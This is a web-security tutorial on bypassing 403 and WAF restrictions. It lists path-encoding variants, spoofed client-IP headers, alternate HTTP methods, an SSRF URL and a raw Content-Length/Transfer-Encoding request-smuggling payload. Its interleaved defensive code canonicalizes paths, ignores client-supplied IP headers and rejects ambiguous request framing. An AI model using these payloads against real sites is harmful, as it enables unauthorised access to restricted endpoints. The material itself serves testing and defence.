What is WAF bypass
WAF bypass occurs when there is a discrepancy between how the web application firewall (WAF) and the server interpret incoming data. Attackers exploit these differences to evade security measures. Techniques such as cache poisoning and other forms of web exploitation rely on this approach.
```
Client ------------------> Proxy ------------------> Server
Client <------------------ Proxy <------------------ Server
```
Determining 403 Type (Proxy VS Server)
Before attempting to bypass a 403 error, the first and most crucial step is identifying whether the restriction is enforced at the proxy layer or the application layer. If the 403 originates from the proxy layer, bypassing it is often possible using various techniques. However, if the restriction is implemented at the application layer, bypassing it is generally not feasible.
Determining Root Restriction
The next step is identifying the root restriction causing the 403 error. For example, if accessing /api/user/userinfo returns a 403, try visiting /api/user/FAKE. If you still receive a 403, the restriction likely applies at least one level higher up the path. To confirm, try accessing /api/FAKE. If this request returns a different status (e.g., 200 or 404 instead of 403), the restriction is set at the /api/user level.
Determining Progression Flow
In some cases, the request passes the WAF on the way in, but the response is blocked on the way back. This can be detected with timing analysis: if a 403 normally appears in ~100ms but takes ~400ms with a different payload, the request likely reached the server and the proxy blocked the response.
Exploitation
Technique 1: URL Manipulation
URL manipulation can be used in multiple ways to bypass proxy server restrictions. The goal is to create a discrepancy between how the proxy interprets the request and how the server processes it.
URL Encoding
```
https://www.domain.com/%61dmin
https://www.domain.com/%25%61dmin
```
Unicode Encoding
```
https://www.domain.com/\%5cu0061dmin
https://www.domain.com/filesfi      → interpreted as "fi" on the server
```
Special Unicode ---> https://bi.tk/utf8.html
FUZZ List ---> Unicode List
Other techniques (Path Traversal | Changing Name Convention | Path Discrepancies)
```
https://www.domain.com/AdMiN
https://www.domain.com/./admin
https://www.domain.com/#/../admin
https://www.domain.com/admin/.
https://www.domain.com//admin//
https://www.domain.com/;/secret
https://www.domain.com/.;/admin
https://www.domain.com//;//admin
https://www.domain.com/admin.json
```
[Figures: Normalization discrepancies; Front-end delimiters (images not reproduced)]
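From the defender's side, the variants above only work because the proxy matches rules against a path it has not canonicalized. The following is an added example (not from the original page) of the canonicalization step a proxy or WAF can run before evaluating its deny rules; it assumes an origin that percent-decodes once, routes case-insensitively, ignores ";" path parameters and folds Unicode with NFKC, and the deny list `RESTRICTED_PREFIXES` is constructed for illustration.

```python
import posixpath
import unicodedata
from urllib.parse import unquote, urlsplit

RESTRICTED_PREFIXES = ("/admin", "/secret")   # constructed deny rule

def canonical_path(url: str) -> str:
    """Return the path the origin is likely to act on, or raise ValueError
    when the request target is ambiguous and should be rejected outright."""
    parts = urlsplit(url)
    if parts.fragment:
        raise ValueError("fragment in request target")   # e.g. /#/../admin
    decoded = unquote(parts.path)
    if "%" in decoded and unquote(decoded) != decoded:
        raise ValueError("double-encoded path")          # e.g. /%25%61dmin
    if "\\" in decoded or "\x00" in decoded:
        raise ValueError("backslash or NUL in path")     # e.g. /\%5cu0061dmin
    decoded = unicodedata.normalize("NFKC", decoded)     # "\ufb01" -> "fi"
    # drop ";param" suffixes that Java-style routers ignore: "/.;/admin" -> "/./admin"
    segments = [seg.split(";", 1)[0] for seg in decoded.split("/")]
    # collapse "//", "/./" and "/../" the way a filesystem-style router would
    normalized = posixpath.normpath("/" + "/".join(segments).lstrip("/"))
    return normalized.lower()

def is_restricted(url: str) -> bool:
    """Deny rule applied to the canonical path; ambiguous targets are denied,
    not passed through for the origin to guess at."""
    try:
        path = canonical_path(url)
    except ValueError:
        return True
    return any(path == p or path.startswith(p + "/") or path.startswith(p + ".")
               for p in RESTRICTED_PREFIXES)
```

The suffix check (`/admin.json`) is there because routers that strip a format extension would otherwise serve the restricted handler under a name the deny rule never saw.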
Technique 2: Header Modification
Header modification can help bypass 403 pages. To test various header-based bypass techniques, you can use the Param Miner extension in Burp Suite.
Headers Relying on IP
```
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
Host: localhost
```
Try different IP ---> 127.0.0.1 | 127.0 | 127.1 | localhost | 2130706433 | ...
Other headers
```
Content-Length: 0   ---> Bypass the WAF if the length is too big (Nowafplz)
X-Rewrite-URL       ---> Rewrite the path
```
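The header list above only grants access when the application derives the client address from a header the client controls. As an added example (not code from the original page), this shows the rule a back end should apply instead: trust the TCP peer, and consult X-Forwarded-For only when the peer is one of your own proxies and only for the entry that proxy appended. `TRUSTED_PROXIES` and the sample requests are constructed; the header names and addresses are the page's.

```python
import ipaddress

TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}   # assumed: our own edge proxy
SPOOFABLE_HEADERS = (
    "x-originating-ip", "x-forwarded-for", "x-forwarded", "forwarded-for",
    "x-remote-ip", "x-remote-addr", "x-proxyuser-ip", "client-ip",
    "true-client-ip", "cluster-client-ip",
)

def effective_client_ip(peer_addr: str, headers: dict):
    """Address that IP-based access rules should be evaluated against.

    Only the TCP peer is trusted by default. If the peer is one of our own
    proxies, use the X-Forwarded-For entry that proxy appended (the last one),
    never earlier entries, which the client controls.
    """
    peer = ipaddress.ip_address(peer_addr)
    if peer not in TRUSTED_PROXIES:
        return peer                       # header values from an unknown hop are ignored
    lowered = {k.lower(): v for k, v in headers.items()}
    hops = [h.strip() for h in lowered.get("x-forwarded-for", "").split(",") if h.strip()]
    if not hops:
        return peer
    try:
        return ipaddress.ip_address(hops[-1])
    except ValueError:
        return peer   # "127.1", "2130706433" and similar shorthand are not accepted

def strip_client_ip_headers(headers: dict) -> dict:
    """Edge-proxy step: drop every client-supplied IP or URL-override header
    before the proxy appends its own X-Forwarded-For."""
    blocked = SPOOFABLE_HEADERS + ("x-original-url", "x-rewrite-url")
    return {k: v for k, v in headers.items() if k.lower() not in blocked}
```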
Technique 3: Change Request Method
Altering the request method in the header can potentially enable you to bypass proxy restrictions by changing how the request is processed, allowing it to evade certain filtering or blocking mechanisms typically enforced by the proxy.
Change the HTTP method used in requests:
```
GET
POST
PATCH
PUT
DELETE
OPTIONS
HEAD
CONNECT
TRACE
INVENTED
HACK
```
Technique 4: Direct IP Access
Another way to bypass a 403 error from a proxy is by directly identifying the server's IP address. In some cases, this can enable you to circumvent the proxy's filtering and access the server directly.
Tools:
- Use tools like Security Trails for historical IP data.
- Utilize the favicon to get the original server IP using the FOFA search engine.
- Perform DNS queries to obtain the server's origin IP.
SSRF
SSRF can also be leveraged to bypass a proxy, as the SSRF query is executed at the server level, effectively circumventing the proxy. By instructing the SSRF to retrieve elements from a 403 page, it can bypass the proxy restrictions since the proxy does not interfere with server-side requests.
http://domain.com/ssrf?url=http://domain.com/admin
Headless browser
????????
Request Smuggling
Request smuggling can be used to bypass a 403 error by crafting a request that is interpreted differently by the proxy and the back-end server. For example, a request can be sent with conflicting Content-Length and Transfer-Encoding headers, causing the proxy to process only the first part of the request while the back-end server processes both parts. This allows the smuggled request to bypass the proxy’s restrictions, potentially accessing resources that would otherwise return a 403 error.
Example:
```
POST / HTTP/1.1
Host: victim.com
Content-Length: 13
Transfer-Encoding: chunked

0

POST /restricted HTTP/1.1
Host: victim.com
Content-Length: 5
```
In this case, the proxy may block the /restricted path, but the back-end server will process the second POST /restricted request, bypassing the proxy and avoiding the 403 error.
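The example above depends on the front end forwarding a request whose body length is ambiguous. As an added example (not from the original page), the check below is what a front-end proxy can run over the raw header block to reject such requests with a 400 instead of forwarding them; `SMUGGLING_SAMPLE` is constructed from the page's example with explicit CRLF line endings, and the reject-rather-than-guess policy is an assumption in line with RFC 9112's treatment of conflicting framing.

```python
# Constructed from the page's example request (CRLF line endings made explicit).
SMUGGLING_SAMPLE = (
    b"POST / HTTP/1.1\r\nHost: victim.com\r\n"
    b"Content-Length: 13\r\nTransfer-Encoding: chunked\r\n\r\n"
    b"0\r\n\r\nPOST /restricted HTTP/1.1\r\nHost: victim.com\r\nContent-Length: 5\r\n\r\n"
)

def framing_problems(raw: bytes) -> list:
    """Return the reasons a request's body framing is ambiguous.
    An empty list means front end and back end will agree on where the body
    ends; anything else should be answered with 400, not forwarded."""
    head = raw.partition(b"\r\n\r\n")[0]
    lines = head.split(b"\r\n")[1:]           # skip the request line
    problems = []
    headers = []
    for line in lines:
        name, sep, value = line.partition(b":")
        if not sep:
            continue
        if name != name.strip():              # "Transfer-Encoding : chunked" obfuscation
            problems.append("whitespace around header name")
        headers.append((name.strip().lower(), value.strip().lower()))
    cl = [v for n, v in headers if n == b"content-length"]
    te = [v for n, v in headers if n == b"transfer-encoding"]
    if cl and te:
        problems.append("both Content-Length and Transfer-Encoding present")
    if len(set(cl)) > 1:
        problems.append("conflicting Content-Length values")
    if any(not v.isdigit() for v in cl):
        problems.append("non-numeric Content-Length")
    for v in te:
        encodings = [e.strip() for e in v.split(b",")]
        if encodings[-1] != b"chunked":       # chunked must be the final coding
            problems.append("Transfer-Encoding does not end with chunked")
    return problems
```

The same check belongs on the back end as well, because the discrepancy only matters when exactly one side is lenient.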